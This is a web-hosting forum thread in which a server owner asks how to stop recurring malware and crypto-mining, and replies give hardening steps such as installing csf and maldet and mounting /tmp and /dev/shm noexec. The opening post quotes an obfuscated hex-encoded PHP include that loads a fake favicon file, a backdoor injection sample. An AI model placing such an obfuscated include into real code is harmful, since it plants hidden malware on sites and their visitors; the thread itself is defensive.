How to block malware/crypto?

D

DaveMaster

Verified User
Joined
May 31, 2016
Messages
15
Hi,

I have a lot malware on server with DA.

Example:
PHP: 
/*a34c6*/

@include "\x2fh\x6fm\x65/\x66a\x73t\x77a\x6ci\x63h\x2fd\x6fm\x61i\x6es\x2fd\x65s\x6bi\x65g\x7ao\x74y\x63z\x6ee\x2ee\x75/\x70u\x62l\x69c\x5fh\x74m\x6c/\x6do\x64u\x6ce\x73/\x70h\x7aa\x75f\x61n\x65o\x70i\x6ei\x65/\x75p\x67r\x61d\x65/\x66a\x76i\x63o\x6e_\x634\x63b\x328\x2ei\x63o";

/*a34c6*/

or another files with hashes.

In /tmp/ have files with name "phpas2sad986f_3987fg" - this is crypto mining script.

How to block for future this server?
 
Do you have secured your /tmp and installed csf/lfd and Maldetect?

Because these files don't come there by themselves, they have to be put there via a leak piece of software or a vulnarable script on a website or something.
 
I dont have csf/lfd, but now istalled csf.

I have maldetect, but without remove/move files to quarantine.
malware 440 I can remove. Files with malware 441 need to be exist, but only first line to be modyfine.

How I can secure /tmp?
 
malware 440 I can remove. Files with malware 441 need to be exist, but only first line to be modyfine.
Click to expand...
Sorry I don't quite understand what you mean by this. You can configure in /usr/local/maldetect/conf.maldet to move to quarantaine if a problem is found.

You can secure /tmp in a couple of ways. With the example below which I use, you create a /tmp of 5 GB space.
Just to be sure I always create a seperate /datmp directory with 777 so you won't get issues when backupping sites bigger then 5 GB. You can choose a name yourself and specify it in directadmin.conf so da will look to that seperate directory.

Back to my example of the normale (and all other) /tmp directory's. I use this:
Code: 
dd if=/dev/zero of=/var/tmpMnt bs=1024 count=5000000
mkfs.ext4 -j /var/tmpMnt
cd /
cp -a /tmp /tmp_backup
rm -rf /tmp/.??* /tmp/*
mount -o loop,noexec,nosuid,nodev,rw /var/tmpMnt /tmp
chmod 1777 /tmp
cp -a /tmp_backup/.??* /tmp_backup/* /tmp/
rm -rf /tmp_backup
echo "/var/tmpMnt   /tmp   ext4   loop,noexec,nosuid,nodev,rw   0   0" >> /etc/fstab
cp -a /var/tmp/.??* /var/tmp/* /tmp
rm -rf /var/tmp
ln -s /tmp /var/tmp
cp -a /home/tmp/.??* /home/tmp/* /tmp
rm -rf /home/tmp
ln -s /tmp /home/tmp

Don't be worried if you get some "does not exist" notices on copying directory's here, because some won't exist.

You then have to adjust your logrotate file. In /etc/cron.daily/logrotate add this line:
Code: 
export TMPDIR=/var/spool/logrotate/tmp
then issue the command:
Code: 
mkdir -p /var/spool/logrotate/tmp

It's best to also secure /dev/shm, which is more easy:
in /etc/fstab change:
Code: 
none /dev/shm tmpfs defaults,rw 0 0
to
Code: 
none /dev/shm tmpfs defaults,nosuid,noexec,rw 0 0
then run the command:
Code: 
mount -o remount /dev/shm

Just to be sure, reboot your server.
 
You must log in or register to reply here.
Back
Top